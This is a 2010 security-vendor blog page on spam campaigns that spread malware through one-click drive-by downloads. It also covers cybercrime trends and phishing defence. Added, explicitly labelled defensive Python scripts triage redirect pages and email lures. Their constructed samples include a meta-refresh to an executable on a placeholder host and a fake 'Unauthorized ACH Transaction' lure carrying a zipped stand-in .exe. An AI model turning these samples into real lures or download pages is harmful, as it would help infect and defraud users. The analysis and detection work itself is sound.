Red Condor's Security Alerts

The Latest Security Trends, Threats and Exploits.
Just Posted: July 29th, 2010
Posted by: Team R.C.

The Art and Science of Writing the Rules of Spam Detection

C.S. is a regular contributor to the Red Condor Security blog and a master at writing anti-spam rules—handwritten scripts that target new, slippery spam campaigns [...]



…And the Plug-and-Play Malware Exploits Continue

July 26th, 2010

Well, these scammers are busy…

Less than 24 hours after issuing a warning of new variations and tactics being used in the one-click, plug-and-play malware campaign that we have been monitoring the past several months, we blocked a number of new messages that spoofed Amazon, ImageShack and Gawab. All of the messages used the plug-n-play malware distribution architecture.

Interestingly, Friday’s messages reverted to the older exploit set that has been in use for the past couple of months.

There is a new twist in these messages, however. The scammers still perform the drive-by download as usual, but instead of using the redirection page to drop the visitor on a Canadian Pharmacy site, the redirect instructs the browser to download an executable (adobe_flash_install.exe) which, as of this morning, was not detected by any AV engine.

Below is the VT analysis of this malware:

http://www.virustotal.com/analisis/53b687184961fbc9799509347608a5bbddb092b46f78f271c072b72d628df8b8-1279910999

Also, in case the browser’s refresh directive does not fire, the redirect page itself renders as a blank page with a single image:

http://www.thecoca-colacompany.com/images/noflash_singlevideo.gif

(The above link is safe to view. The spammers are using a legitimate image hosted on Coca-Cola’s website.)

Clicking on the image on the redirect page will also download the malicious .exe.
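A quick way to confirm what a captured redirect page does, without loading it in a browser, is to parse it for the two paths described above: the meta refresh directive that pulls the executable, and the clickable image that serves as the fallback. The script below is an added example, not Red Condor’s code. The page it parses is constructed to mirror the described behaviour; the host malware.example and the exact path are placeholders, since the real URLs are not given in the post. Python standard library only.

```python
"""Triage a captured redirect/landing page: where can it send the browser?"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Extensions a Windows host hands to the OS to execute rather than render.
EXECUTABLE_EXTS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".msi", ".jar")


def is_executable_url(url):
    """True if the URL path names a file a Windows host would run."""
    return urlsplit(url).path.lower().endswith(EXECUTABLE_EXTS)


def parse_refresh_target(content):
    """Extract the URL from a meta-refresh 'content' value such as
    '0; url=http://...'. Browsers accept optional quotes, any case for
    'url' and spaces around '=', so be as lenient as they are."""
    for part in content.split(";")[1:]:
        key, _, value = part.strip().partition("=")
        if key.strip().lower() == "url":
            return value.strip().strip("'\"")
    return None


class RedirectPageParser(HTMLParser):
    """Collects every outbound target on the page: meta refresh, links
    (noting which ones wrap an image) and src-bearing embedded content."""

    def __init__(self):
        super().__init__()
        self.refresh = None        # meta-refresh target, if any
        self.links = []            # [href, wraps_image]
        self.embeds = []           # src of iframe/object/embed/script
        self._open_link = None     # index into self.links while inside <a>

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}      # HTMLParser lowercases names
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.refresh = parse_refresh_target(a.get("content", ""))
        elif tag == "a" and a.get("href"):
            self.links.append([a["href"], False])
            self._open_link = len(self.links) - 1
        elif tag == "img" and self._open_link is not None:
            self.links[self._open_link][1] = True      # the "blank page with one image" case
        elif tag in ("iframe", "object", "embed", "script"):
            src = a.get("src") or a.get("data")
            if src:
                self.embeds.append(src)

    def handle_endtag(self, tag):
        if tag == "a":
            self._open_link = None


def triage(page_html):
    """Return one finding per outbound target, flagged when it is an executable."""
    p = RedirectPageParser()
    p.feed(page_html)
    findings = []
    if p.refresh:
        findings.append({"kind": "meta-refresh", "url": p.refresh,
                         "executable": is_executable_url(p.refresh)})
    for href, wraps_image in p.links:
        findings.append({"kind": "image-link" if wraps_image else "link",
                         "url": href, "executable": is_executable_url(href)})
    for src in p.embeds:
        findings.append({"kind": "embed", "url": src,
                         "executable": is_executable_url(src)})
    return findings


# Constructed page modelled on the described redirect; malware.example is a placeholder.
SAMPLE_PAGE = """<html><head>
<meta http-equiv="refresh" content="0; URL=http://malware.example/adobe_flash_install.exe">
</head><body>
<a href="http://malware.example/adobe_flash_install.exe">
<img src="http://www.thecoca-colacompany.com/images/noflash_singlevideo.gif" />
</a>
</body></html>"""

if __name__ == "__main__":
    for f in triage(SAMPLE_PAGE):
        flag = "EXECUTABLE" if f["executable"] else "ok"
        print(f"{f['kind']:12} {flag:10} {f['url']}")
```

Run against a saved copy of the page (for example, fetched with curl from an isolated analysis host); both the meta refresh and the image link are reported as executable downloads, which is exactly the pair of behaviours described above.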

All this is in addition to the usual litany of exploits typically employed by these campaigns; they are using a couple of different versions this time. None of these variations is detected by more than a handful of AV engines. The malicious payloads include two signature-distinct executables, most likely two instances of the same Trojan that has simply been mutated:

http://www.virustotal.com/analisis/fe6bf009c6e3085d0f41e14022a2b5729a0c3cc7622c81c7234ab21b0d07dc9d-1279912776

http://www.virustotal.com/analisis/d6af1138118bba51c20fa74a1a6fc560f84e98d4cb3830c1a37d14a7b4d70b37-1279909339

Additionally there is the usual, freshly mutated PDF exploit:

http://www.virustotal.com/analisis/2a56e56ea197fdbf77ee7fe77125bc67a5c89474dcc99bc0789000956c198788-1279912917

And of course there are the other exploits that usually accompany these campaigns, but they do not appear to have changed much.

Posted by: C.S.

One-Click Malware Spammers Continue to Find New Avenues of Exploitation

July 22nd, 2010

In more than one blog post during the last several months, we have discussed a sophisticated plug-and-play malware campaign that infects users’ computers with a single click. During that time the spammers have spoofed several major brands, including Facebook, eBay, Amazon, YouTube, GoDaddy.com, WordPress and Wikipedia. Today we blocked another variant; at the time we blocked it, the drive-by downloader component was detected by only a single anti-virus engine (as is typical for these campaigns).

One of the emails in the campaign had this subject line: “Unauthorized ACH Transaction.” The email warns recipients that an unauthorized ACH transaction was recently initiated from their bank account but was rejected by the “Electronic Payments Association.” The recipient is then invited to click on an embedded link to review the transaction report. That single click could infect the user’s computer with a Trojan.

We also noticed other campaigns today using the same technique but spoofing Xerox WorkCentre notifications, the messages those devices send when they deliver a scanned document as an email attachment.

The one-click malware spammers finally switched out one of the older exploits they had been using for months (CVE-2006-0003). It was replaced with a more recent one, the Windows Help Center vulnerability (CVE-2010-1885). This vulnerability was reported in early June, and Microsoft recently issued a patch for it (MS10-042). For the first time that I am aware of, this particular vulnerability is being exploited in combination with yet another vulnerability, CVE-2010-2265, that allows cross-site scripting (XSS), thereby classifying this spam attack as a blended threat and ultimately achieving remote code execution.

It appears that the code used in this attack was copied verbatim from public exploit repositories that collect such threats for research purposes. It’s worth noting that the previous exploits from this campaign also used proof-of-concept code virtually unchanged from public sources.

Game-changing, plug-and-play attacks

Here is an example of the newly introduced code being used in this attack:

https://www.metasploit.com/redmine/projects/framework/repository/revisions/9495/diff/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb

I’ve been writing about this new trend in one-click malware <http://www.redcondor.com/blog/?p=258> for months now. Recently, I had an epiphany.

Essentially, the spammers have constructed an efficient malware distribution framework in which their “normal” spam campaigns do double duty. Every campaign becomes an efficient search of Internet-connected hosts to find and exploit vulnerable machines.

This activity is transparent to the normal function of their spam campaigns. In other words, they can spamvertize any website as usual, but now have the added bonus of piggybacking these campaigns with modular attacks that can be updated by criminals at any time and with little effort.

For this reason I have started referring to this technique as a “plug-n-play” architecture because they can simply chain on exploits as they become available without needing to modify their spam campaigns in any way. They can use this technique in any spam campaign that uses a URL based call-to-action. This is a game changer.

Spammers ironing out the kinks

Despite their sophistication, it appears that the spammers are still trying to iron out some kinks. One of the samples that we blocked earlier in the day had a broken call-to-action URL, and in another sample that I analyzed the redirect page was broken too: the redirect sent the browser to the malware distribution site itself instead of the usual Canadian Pharmacy (or similar) drop-site. This may indicate that some type of kit is behind this recent wave and that some spammers haven’t quite figured out how to use it effectively.

These campaigns occurred almost simultaneously with several other variants, all using the same “ACH” and Xerox templates. But instead of using the redirection URL that is the earmark of this plug-n-play exploit framework, they used a direct link to a Windows executable (.exe). Additionally, another variant was observed that embedded the malicious executable within an archive attached directly to the spam. These more direct and traditional methods of infection, occurring alongside the plug-n-play variant, suggest that the scammers are testing which delivery method is more successful.
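The three delivery methods described above (a redirection URL as the call-to-action, a direct link to a Windows executable, and an executable inside an attached archive) can be told apart mechanically at the mail gateway. The script below is an added example, not Red Condor’s filter or code. It builds a constructed message modelled on the ACH lure (the sender, hostnames, link text and archive contents are placeholders, not taken from a real sample), then reports call-to-action links whose displayed host differs from the host the href actually goes to, links that point straight at an executable, and archive attachments that contain one.

```python
"""Flag the delivery methods seen in the ACH/Xerox variants inside an .eml."""
import io
import re
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlsplit

EXECUTABLE_EXTS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")
# A host-name-looking token in link text, e.g. "www.amazon.com" in "visit www.amazon.com".
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b")


def is_executable_url(url):
    return urlsplit(url).path.lower().endswith(EXECUTABLE_EXTS)


def registrable(host):
    """Crude registrable domain (last two labels). Good enough for the .com
    brands in the post; a public-suffix list is needed for co.uk and friends."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def link_domain_mismatch(href, shown_text):
    """True when the link text shows one host but the href goes to another
    registrable domain: the classic brand-spoof call-to-action."""
    m = HOST_RE.search(shown_text.lower())
    target = urlsplit(href).hostname
    if not m or not target:
        return False
    return registrable(m.group(1)) != registrable(target)


class LinkCollector(HTMLParser):
    """Pairs every <a href> with the text the reader actually sees."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def triage_message(raw_bytes):
    """Return findings for links in the HTML body and for attachments."""
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        filename = part.get_filename()
        if part.get_content_type() == "text/html" and not filename:
            lc = LinkCollector()
            lc.feed(part.get_content())
            for href, text in lc.links:
                findings.append({"kind": "link", "url": href, "text": text,
                                 "executable": is_executable_url(href),
                                 "domain_mismatch": link_domain_mismatch(href, text)})
        elif filename:
            data = part.get_payload(decode=True) or b""
            members = []
            if data.startswith(b"PK\x03\x04"):        # ZIP local file header
                try:
                    with zipfile.ZipFile(io.BytesIO(data)) as zf:
                        members = zf.namelist()       # names only; nothing is extracted
                except zipfile.BadZipFile:
                    pass
            execs = [n for n in [filename] + members if n.lower().endswith(EXECUTABLE_EXTS)]
            findings.append({"kind": "attachment", "filename": filename,
                             "members": members, "executables": execs})
    return findings


# Constructed lure modelled on the ACH template; every host and address is a placeholder.
SAMPLE_HTML = """<html><body>
<p>An unauthorized ACH transaction was initiated from your account and rejected.</p>
<p>Review the report: <a href="http://cta-host.example/in.php?id=7731">https://www.electronicpayments.example/transaction-report</a></p>
<p>Or download it directly: <a href="http://cta-host.example/Transaction_Report.exe">Download report</a></p>
</body></html>"""


def build_sample_message():
    """Serialize a constructed .eml carrying both link variants and a zipped executable."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Transaction_Report.exe", b"MZ" + b"\x00" * 62)   # stand-in bytes, not malware
    msg = EmailMessage()
    msg["From"] = "Electronic Payments Association <alerts@epa-notify.example>"
    msg["To"] = "victim@corp.example"
    msg["Subject"] = "Unauthorized ACH Transaction"
    msg.set_content("An unauthorized ACH transaction was rejected. See the attached report.")
    msg.add_alternative(SAMPLE_HTML, subtype="html")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="transaction_report.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for f in triage_message(build_sample_message()):
        print(f)
```

The registrable-domain check is deliberately crude; at a real gateway, swap it for a public-suffix lookup. Reading `namelist()` from the archive without extracting is enough to spot the attached-archive variant, and it avoids ever writing the member to disk.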

A final note: The executables being used in the campaign appear to be Zbot/Bredo variants, “banking” Trojans that Red Condor has reported on in past security alerts.

Posted by: C.S.

Top 5 Cybercrime Trends to Watch

July 22nd, 2010

In lieu of the usual year-end Top __ List (fill in the blank), I’ve decided to post my Top 5 list of trends to watch, mid-year. The underground economy built on the greed and ambition of cybercriminals is maturing, opening up new opportunities to exploit users, governments, and corporations. It behooves all of us to learn what we can, now.

1. Criminals will increasingly leverage opportunities to commit corporate and/or political espionage and intellectual property theft.

With hundreds of millions of infected machines connected to the Internet, there is much potential for dedicated adversaries to seek access to zombies in specific organizations as preliminary steps in sophisticated targeted attacks. Several such events have been reported recently. As bot-herders awaken to the vast potential that their compromised machines represent — both in terms of local information as well as footholds into private networks — these information warfare attacks will ramp up considerably.

Right now, I presume the major impediment to these activities is simply in connecting the supply to the demand and vice-versa. As the information age underground economy continues to expand and mature, these activities have the potential to spread like wildfire.

2. More refined systems for the monetization of private information.

Count on a rise in the number of ransom demands by criminals in exchange for stolen information. The case of the encrypted hard drive is only the beginning.

It won’t be long before criminals figure out what they can really do with all that information, perhaps starting as a fallback if they’re unable to sell a particular resource.

In a similar vein, it is likely that blackmailing could become another significant emerging threat. However the target of these blackmailing attempts won’t be limited to execs and political figures, but will include all Internet users. I see it as a simple attack that could be easily mounted in a manner similar to the way “lost wallet” scams are sent to the address book of recently compromised web-mail accounts.

3. An explosion of plug-and-play malware distribution.

The development of phishing and malware kits led to a threat explosion due to a lower bar to entry and ease of reproduction. A similar trend seems to be occurring, with modular plug-and-play malware distribution methods that can be easily and transparently inserted into any spam campaign. This effectively turns any spam campaign into an efficient search method for finding and exploiting vulnerable hosts.

In the past, malware-based spam campaigns were of a single intent, to install malware on as many systems as possible, and were perpetrated by bot-herders to increase the size of their flock. Individually crafted, these campaigns take advantage of a specific new exploit or leverage popular news items and holidays.

Now it appears that a new strategy is forming where any spam campaign can simply “plug in” a malware component. The stealthy drive-by techniques that enable it are general purpose, so the malware distribution infrastructure can be re-used in future campaigns without difficulty. The exploits can even be updated in real-time as new vulnerabilities are found. I expect this technique to become a permanent feature of many future spam campaigns.

4. Increased use of novel attack vectors.

Only recently has the average netizen become aware of the many potential risks associated with the use of social networking sites. These services represent new ways for attackers to interface with their victims, perform reconnaissance for extended targeted attacks, and exploit the implicit trust you have in your “friends” by impersonating them. And as technologically advanced tools like smart-phones, smart-cars and other “smart” things pervade our lives, I expect that we will see completely novel exploits that will catch many people off guard.

We might begin to see increased attacks on personal area networks that seek to exploit Bluetooth communications, attempts to fingerprint individuals based on signatures formed from the signals emitted by the myriad devices we constantly carry, or social engineering attacks used to gain access to vehicles with remotely accessible door locks.

The ways in which technology intersects our everyday lives will fall under increased scrutiny by criminals seeking to take advantage of subtle, overlooked vulnerabilities that can stack up with disastrous consequences. Even now, with the mainstream adoption of online banking, many people still don’t understand the importance of securing their wireless home networks.

5. A significant increase in spam and scams perpetrated via VoIP and other communication protocols.

The fundamental properties of SMTP that led to the massive proliferation of spam are: cheap electronic message transmission and openness in communication endpoints (anyone can message anyone else).

VoIP systems also have these properties and as VoIP continues to proliferate, become more integrated, cheaper to access and utilize, along with several other enabling components (such as cheap bandwidth, text-to-speech, speech-to-text and translation systems), I expect that information age criminals will branch out more fully into this medium. Already there have been several reports of “vishing” attacks carried out by scammers, and I would expect these attacks to increase in volume and sophistication.

I expect new and creative attacks carried out through other systems that share these properties but have better call-to-action potential, like instant messaging, micro-blogging, etc. Obviously these have been and are being abused by spammers and their ilk. But they have not yet been exploited to anywhere near the degree seen in email. As various enabling factors continue to emerge, I expect the same perverse inversion in the ratio of legitimate to illegitimate traffic to occur in VoIP and other protocols over the long term.

Posted by: C.S.

Corporate Execs Need to Heed the Phishing Wakeup Call

July 14th, 2010

Cyber-attacks are a big topic in the media and blogosphere these days. A wake-up call, finally. Rogue states and unfriendly regimes launch attacks against the U.S., South Korea and other nations. Corporate spies and independent hackers infiltrate networks to obtain trade secrets and financial and account data that will either command a price on the black market or provide criminals with the means to perpetuate more criminal activities.

In a recent report by the Ponemon Institute, of the 83 percent of executives who reported that their companies had been victims of an advanced threat, nearly half reported a theft of confidential information or intellectual property. That’s a hefty number of occurrences. And yet, for all the money corporations spend on physical security (cameras in the lobby, ID badges, biometrics and body scanners), digital “property” remains vulnerable to attack.

Secure access to the corporate network should expand beyond the username and password paradigm into new paradigms for protection such as biometrics and digital keys. Users need to be better educated about the dangers of phishing emails, especially in this era of sophisticated attacks that spoof trusted brands such as Adobe, eBay and AT&T.

Aside from an effective anti-spam filter, the strongest defense against phishing attacks is safe user behavior, stringent policies and training procedures, and technologies that support email security solutions. To this end, Red Condor recommends the following:

  • Strong corporate policies reinforced with regular in-person security briefings and education opportunities
  • Isolated internal networks, accessible from protected terminals, for storing valuable intellectual property – anything connected to the Internet can be stolen.
  • Stronger passwords – Establish passphrases instead of passwords. Most people use the same passwords or variations of the same passwords for multiple accounts, which makes it easy for cybercriminals to piece together identities.
  • Cyber security should be treated with the same level of importance as physical security; deploy personal authentication devices, including biometrics and digital keys for all of your users.

Financial institutions should take the lead in security, given the sensitivity of the data they protect and the questions of customer liability that arise when corporate accounts are compromised. The Experi-Metal (EMI) and Comerica Bank suit provides an example of the real costs of phishing. The case involves an EMI employee unwittingly responding to a phishing email, which ultimately allowed scammers to transfer half a million dollars from EMI’s corporate bank account to accounts around the world. EMI is now suing Comerica for the losses.

Cases like this one, with more sure to follow, indicate that corporations and their executives have yet to grasp the size and scope of the phishing problem. Only new security products that complement email security solutions, together with continually updated user policies and education programs, will suffice. For these changes to occur, executives need to heed the wake-up call.

Posted by: Team R.C.